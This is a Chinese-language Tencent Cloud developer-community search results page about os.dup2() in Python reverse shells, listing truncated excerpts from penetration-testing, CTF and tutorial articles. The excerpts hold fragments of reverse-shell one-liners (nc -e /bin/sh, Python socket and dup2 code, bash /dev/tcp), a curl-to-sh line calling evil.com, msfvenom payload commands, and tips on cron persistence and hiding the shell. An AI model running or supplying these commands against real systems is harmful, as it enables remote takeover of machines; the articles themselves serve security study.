当与套接字一起使用时，os.dup2()在python反向shell中做什么？ - 腾讯云开发者社区 - 腾讯云

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

Linux环境反弹shell原理与姿势

，那么在这种情况下我们就需要考虑——反弹shell，即攻击者在攻击主机上开启端口监听，随后让目标主机反向连接攻击者的服务器，从而规避防火墙、端口、权限等问题，本篇文章我们主要介绍Linux环境中如何通过命令执行来反弹...shell 基础知识描述符类文件描述符(File Descriptor，FD)是一个非负整数，用于标识进程打开的文件或其他输入/输出资源(例如:管道、网络套接字等)，在Linux和Unix系统中文件描述符是实现文件操作的基本机制之一...HTTP回调，当事件发生时服务会向指定的URL发出请求反向Shell：黑客可能通过利用反向Shell技术，从受害者的机器上反向连接回攻击者的机器以获取控制权远程管理工具：某些远程访问工具会在被管理设备上运行代理程序...，同时将所有输入和输出都重定向到这个连接中，使得攻击者可以直接在受害者的shell中执行命令其他反弹 NC反弹shell 如果目标机器上有nc并且存在-e参数，那么可以建立一个反向shell： Step...交互式shell中执行的命令会重定向输出到5555中 Python反弹shell Step 1：在Attack上监听： nc -lvp 1234 Step 2：在Victim上执行以下命令 python2

1521 0

Linux下反弹Shell方法

在日常工作中，我们需要得到目标系统的shell。在局域网相对简单，而不在同一局域网或者是异地网络。那么如何让目标直接互通执行相关shell命令呢？...通过本文我们一起来看看Linux如何反弹shell。...(['/bin/bash','-i']);" 还是一样，我们在Centos中执行命令 nc -lvp 9090 在kali中执行命令 python3 -c "import os,socket,subprocess...shell 原理分析使用socket与远程建立起连接，接下来使用到了os库的dup2方法将标准输入、标准输出、标准错误输出重定向到远程，dup2这个方法有两个参数，分别为文件描述符fd1和fd2，当fd2...,需要的条件是被反弹shell的机器安装了nc 在Centos上使用nc监听端口： nc -lvp 9090 在目标机上使用nc去反向连接，命令如下： nc 123.6.44.67 9090 -e /bin

2.3K3 0

您找到你想要的搜索结果了吗？

是的

没有找到

如何使用LAZYPARIAH实时生成反向Shell Payload

关于LAZYPARIAH LAZYPARIAH是一款功能强大的命令行工具，该工具依赖的组件并不多，但是却可以帮助广大研究人员在渗透测试过程中利用命令行接口实时生成反向Shell Payload。...LAZYPARIAH基于纯Ruby开发，是一款简单实用、易于安装且功能强大的命令行工具，该工具可以在渗透测试或CTF夺旗比赛过程中，实时生成大量反向Shell Payload。...LAZYPARIAH支持的反向Shell Payload包括但不限于下列形式： 1、C代码Payload（实时编译）：c_binary 2、Ruby Payload：ruby、ruby_b64、ruby_hex...gzip_hex 使用zlib压缩c_binary、rust_binary或java_class，并对结果进行十六进制编码工具使用和注意事项其中，以_c结尾的Payload可以在Shell...会话中执行，有些Payload则需要使用相对应的解释器来执行。

6952 0

Python守护进程daemon实现

它可以在Linux系统启动时从启动脚本/etc/rc.d中启动，可以由作业规划进程crond启动，还可以由用户终端（通常是shell）执行。此外，守护进程必须与其运行前的环境隔离开来。...3.启动方式特殊，它可以在系统启动时从启动脚本/etc/rc.d中启动，可以由inetd守护进程启动，可以由crond启动，还可以由用户终端（通常是shell）执行。...如前所述，由继承得来的文件模式创建屏蔽字可能会被设置为拒绝权限。我们可以根据我们的具体需求设定特定的权限。 2、调用fork，然后使父进程exit。这样做，使得当我们以..../的shell命令启动守护进程时，父进程终止会让shell认为此命令已经执行完毕，而且，这也使子进程获得了一个新的进程ID。...8、用日志系统记录出错信息因为守护进程没有控制终端，当进程出现错误时无法写入到标准输出上，可以通过调用syslog将出错信息写入到指定的文件中。

7.7K3 0

0x2 Python教程：反向Shell

比如说，你有一个潜在受害者的原始shell，并希望拉过一个Python反向shell（或meterpreter二进制文件），以便更好地访问主机。...您可以在单行代码中快速启动Python Web服务器，然后将文件拉过来。要创建python HTTP服务器，可以利用内置函数“SimpleHTTPServer”。...我们将利用套接字和子进程模块与OS进行交互。我非常喜欢子进程模块，因为它允许您将STDOUT存储到一个变量中，该变量可以在脚本中进一步填充。...上面的代码基于我们在教程0x1中介绍的概念，但除了建立套接字连接之外，我们现在正在使用子进程模块执行命令。子进程模块非常方便，因为它允许您将STDOUT / STDERR从命令重定向到变量。...下面是一个监听器，用于捕获反向shell并正确解码/编码输入/输出，因此我们可以在终端上看到明文，但数据包内容是XOR编码的。 ? 这是一个非常有趣的Python用例，因为每个人都喜欢shell！

1.1K3 0

反弹Shell，看这一篇就够了

前言在渗透测试实战中，我们经常会遇到Linux系统环境，而让Linux主机反弹个shell是再常见不过的事情了。...>& 将联合符号前面的内容与后面相结合，然后一起重定向给后者。...将反弹shell的命令写入定时任务我们可以在目标主机的定时任务文件中写入一个反弹shell的脚本，但是前提是我们必须要知道目标主机当前的用户名是哪个。...各种脚本反弹shell Python 脚本反弹shell 当目标主机上有python环境时，我们可以用Python来反弹shell。...os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 执行效果如下： php 脚本反弹shell 当目标主机上有php环境时，我们可以用

30.2K13 13

内网隧道搭建总结(一)

环境配置该操作在vm虚拟机中完成，提前安装了Windows7、kali linux、Windows server2008。...攻击机 win08 192.168.238.13 在受害者机器上运行 nc -lvp 7777 -e /bin/sh 然后在攻击机上主动连接受害者机器运行此时成功 5.4.2 反向连接shell...08上就接收到了反弹的shell 5.5.2 python反弹 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET...192.168.238.13 首先在攻击机上开启监听 nc64.exe -lvp 7777 在kali上执行python反弹命令，注意：这里使用的是python2，不是python3 python...(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 在攻击机就可以接收反弹的

2.2K1 0

如何在Ubuntu 16.04上使用uWSGI和Nginx为Django应用程序提供服务

然后，我们将设置Nginx以反向代理到uWSGI，使我们能够访问其安全性和性能功能来为我们的应用程序提供服务。...如果您使用的是Python 3和pip3命令，则还需要在shell初始化脚本中添加一行： echo "export VIRTUALENVWRAPPER_PYTHON=/usr/bin/python3"...在我们对uWSGI的测试中，我们使用了HTTP和网络端口。但是，由于我们将使用Nginx作为反向代理，我们有更好的选择。...通常，在受限制的环境中创建套接字或权限错误时会发生这种情况。虽然uWSGI进程能够创建套接字文件，但Nginx无法访问它。如果根目录（/）与套接字文件之间的任何点上的权限有限，则会发生这种情况。...之后，我们设置Nginx作为反向代理来处理客户端连接并根据客户端请求提供正确的项目。 Django通过提供许多常见的部分使创建项目和应用程序变得简单，使您可以专注于独特的元素。

4.3K0 0

攻防|反弹shell方式汇总

，它只执行一次，BEGIN是awk的关键字，这个地方这条和下一条语句是拆开的，也可以合并在一起执行，注意合在一起执行的话，这条语句后面要加分号，比如看下面gawk，我会合并执行） for(;s|&getline...需要利用icmpsh_m.py和nishang中的Invoke-PowerShellIcmp.ps1 来反弹ICMP shell。...(['/bin/bash'])" 但是当前情况还是不能补全代码，得用stty来进行优化，来转换成完美shell 在执行完python命令之后，按下Ctrl+z Linux 中Ctrl + c/d/z 看着都差不多...(只要不是在第一行)，那么只能看成是注释。运行之前需要设置sh的运行权限chmod 777 * 当source命令执行有问题时，bash继续执行下面命令。系统默认的shell是bash。 #!...所以也就是在Ubuntu中可以认为/bin/sh就是/bin/dash, 如果打算使用bash, 可直接将/bin/sh软链接到/bin/bash. root@b3fe92a89f30:/# ll -h

1.1K1 0

python与安全（四）shell反弹

有的SSTI中的姿势也可以借鉴过来. 工具 1.姿势查找这是p神在星球分享的工具，有各种环境的姿势，非常全面。 ?...nc-l 1337 （2）在目标上执行反向Shell 在目标计算机上，将https://shell.now.sh/yourip:port的输出通过管道传递到sh。...您可以在evil.com上的服务器上侦听连接，并从安全网络内部获得反向外壳。...curlhttps://shell.now.sh/evil.com:1337 |sh （5）持续连接默认情况下，当外壳退出时，您将失去连接。您可能会通过无效命令意外地执行此操作。...以下命令将在后台进程中运行反向外壳程序并退出终端，在受害者的计算机上没有打开看起来可疑的终端窗口。确保在新的终端窗口中运行此命令，否则将丢失现有会话中的任何工作。

7521 0

什么是反弹 Shell？

那么如果用正向 Shell，其实就是在 A 上输入 B 的连接地址，比如通过 ssh 连接到 B，连接成功之后，我们就可以在 A 上通过命令控制 B 了。...如果用反向 Shell，那就是在 A 上先开启一个监听端口，然后让 B 去连接 A 的这个端口，连接成功之后，A 这边就能通过命令控制 B了。反弹 Shell 有什么用？...反弹 Shell 案例首先我们先看一个标准的反弹 Shell 的例子，这里我们一共需要两台主机： A 是控制端，可以处于公网之中，也可以和 B 处于一个局域网中，总之能让 B 找到 A 就行。...Python 之父 Guido 的推荐，目前本书正在七折促销中！...内容介绍：《Python3网络爬虫开发实战（第二版）》内容介绍扫码购买好文和朋友一起看~

1.1K1 0

内网渗透基石篇-- 隐藏通信隧道技术（上）

防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。...类型 IPV6 over IPV4隧道，把IPV6报文封装到IPV4报文中，使IPV6的流量可以穿越IPV4网络 IPV4 over IPV6隧道，把IPV4报文封装到IPV6中，使IPV4的流量可穿越...2.反向shell：服务端想要获得客户端的shell（也就是反弹shell）先弹shell就是正向shell，后连接后弹shell就是反向shell，先监听 ? ?...4.在目标主机中没有nc时获取反向shell 1.python反向shell nc -lvp 2222 1.服务端（kali 上监听2222） 2.客户端一上线，服务端就成功控制客户端了 ?...socks4和5两种类型，socks4只支持TCP协议而socks 5支持TCP/UDP协议，还支持各种身份认证机制等协议 Lcx 1.介绍最为经典而且也是最为频繁的端口转发工具，是一个基于socket套接字实现的端口转发工具

2.5K3 2

Linux下几种反弹Shell方法的总结与理解

当>&后面接文件描述符时，表示将前面的文件描述符重定向至后面的文件描述符也有师傅把&这个符号解释为是取地址符号，学过C语言的小伙伴们都知道&这个符号代表取地址符，在C++中&符号还代表为引用，这样做是为了区分文件描述符和文件...理解了上面这些知识，下面来解释一下这一条反弹shell的命令首先，bash -i代表在本地打开一个bash，然后就是/dev/tcp/ip/port， /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个...在CentOS下使用python去反向连接，输入： python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM...可以看到kali上成功反弹到了shell，可以执行一些命令： ? 在已经深入理解了第一种方法的原理后，下面来解释一下python反弹shell的原理。...首先使用socket与远程建立起连接，接下来使用到了os库的dup2方法将标准输入、标准输出、标准错误输出重定向到远程，dup2这个方法有两个参数，分别为文件描述符fd1和fd2，当fd2参数存在时，就关闭

1.9K1 0

记一次 Samba 服务器渗透

在极少数情况下，例如当SMB共享目录和Web服务器根目录相同时，攻击者甚至可能利用这种错误配置来实现代码执行。...由于 10123 端口上是 Python 启动的 HTTP 服务，shell.php 无法被解析，所以如果我们要利用的话还需要从 80 口进行利用。...然后尝试使用 bash、nc 反弹 Shell 皆失败，由于目标主机上存在 python，我们完全可以使用 python 来反弹 Shell： python3 -c 'import socket,subprocess...LXD 是一个 Root 进程，它可以负责执行任意用户的 LXD UNIX 套接字写入访问操作。...攻击机使用 python 在 lxd-alpine-builder 目录里面开启一个 HTTP 服务： python3 -m http.server image-20210520002627177 然后控制目标机使用

1.7K3 0

「翻译」如何Bypass rbash

在本文中，我们会讨论关于有限的shell或者bash。它常出现在许多CTF挑战中，并且我们将基于多种方法学习如何bypass rbash。...绕过 rbash的方法 1、使用编辑器绕过rbash vi 编辑器 ed编辑器 2、使用一行代码绕过rbash python perl awk 3、通过反向shell绕过rbash 4、使用系统二进制文件绕过...三、通过反向shell绕过rbash 1、python 你也可以选择反向shellcode来绕过rbash，这里我们使用python反向shellcode，这会将"sh:bourne shell"抛给使用...netcat 监听的机器（在本例中是kali linux) nc -lvp 1234 在监听之后，我们需要运行如下命令 python -c 'import socket,subprocess,os...2、PHP 同样的，你可以在需要执行的主机上使用php反向shellcode，在你监听的IP上就会获得反向连接的shell。

1.2K1 0

关于Shell你想知道的都在这儿

利用sshd来反弹shell,ln -f的意思就是把原有的数据清空,整体语句的意思通俗点儿讲,就是把sshd绑定在本地的8080端口上,这样当别人从8080这个端口进来的时候就相当于直接进到本机的sshd...利用py反弹shell,就像perl一样,py在绝大多数发行版上都已经自带,但默认版本都是2.6.6的,不过,对我们弹个shell来说,足矣,当然啦,这里只是用最简单的py的socket来反弹一个shell...0x06 一些小结反弹的核心说白点其实就是和目标系统建立socket(如果中间[不管是正向还是反向]端口被防火墙阻断了,那你可能就只能选择复用或者直接走更底层的协议了,还是那句话,只是一个shell...而已,方法已经有了,怎么在实战中按照自己的需求改进,可能才是你更需要思考的,我们都看到了,反弹的时候,进程会一直处于挂起状态,实际中放到后台跑就好了,另外,说实话,像这种基于tcp的shell,瞟一眼就发现了...,最多可能只能在实际渗透中临时用用……,相信我们最终想要的,还是基于这个出来的思路,而不是这些死技巧,自己平时确实很少发文章,主要目的还是想多跟大家一起学习交流进步, bon soir !

1.3K5 0

Vulnhub靶机实操笔记-SickOS1.1-解法二

版本小于等于4.3的*inux的系统之中，只要目标服务器开放着与Bash相交互的应用与服务，就有可能成功触发漏洞，获取目标系统当前Bash运行用户相同权限的shell接口。...四、内网提权 1、查已安装的软件&python转稳定shell 命令会列出系统中所有已安装的软件信息，显示当前环境安装了python工具，利用python转稳定交互shell dpkg -l #查已安装的软件...%20Resources/Reverse%20Shell%20Cheatsheet.md#python python -c 'import socket,os,pty;s=socket.socket(...(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 因为在python文件中修改的，所有插入下面的具体内容 import socket,os,pty...cd到/var/www对connect.py文件进行修改，shell比较奇怪，输入o新建一行，如何将shellcode输入到python中 ? 成功获得root权限 ?

3600 0

如何反弹shell

、反向shell等等。...reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。...Python脚本反弹shell 同样的我们还是在攻击机开始端口监听，nc -lvp Target_Port 在靶机上执行python -c 'import socket,subprocess,os;s=...(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Others 反弹shell...，即可反弹shell curl Target_IP|bash 将反弹shell的命令写入定时任务我们可以在目标主机的定时任务文件中写入一个反弹shell的脚本，但是前提是我们必须要知道目标主机当前的用户名是哪个

9141 0

远控免杀专题文章(2)-msfvenom隐藏的参数

几个重要的监听参数防止假session 在实战中，经常会遇到假session或者刚连接就断开的情况，这里补充一些监听参数，防止假死与假session。...在上面的生成payload参数中：（1）PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程，自己测试的时候不建议到这个进程而是其他的持久进程...nc反向连接，监听 msfvenom -p windows/shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe> 1.exe Shellcode...LHOST=10.211.55.2 LPORT=3333 -f raw > shell.py Python正向shell python/python3 -c 'import socket,subprocess...(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' python/python3

2K1 0

内网渗透之隐藏通信隧道技术

在攻击机上使用ifconfig查看IP发现已经是受害机的IP (2).反向shell 即受害及主动来连接攻击机，这种方法在渗透测试中更为常用，因为它可以突破许多边界设备的封锁在攻击机上执行 nc -lvp...1.使用python反弹shell 执行如下命令，在攻击机上监听本地1234端口 ?...攻击机上收到回弹shell ? 但是这种方法又建立在受害及上存在python环境的情况下如果受害机上没有python环境怎么办呢？...可以看到在攻击机上以及收到了反弹shell ? 那如果在受害机上既没有python环境又没有php环境该怎么办呢？...可以看到已经接收到了win server2008 的shell 使用nc反向连接powercat 在攻击机中执行 nc -l -p 5678 -vv 开启监听本机5678端口 ?

1.8K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭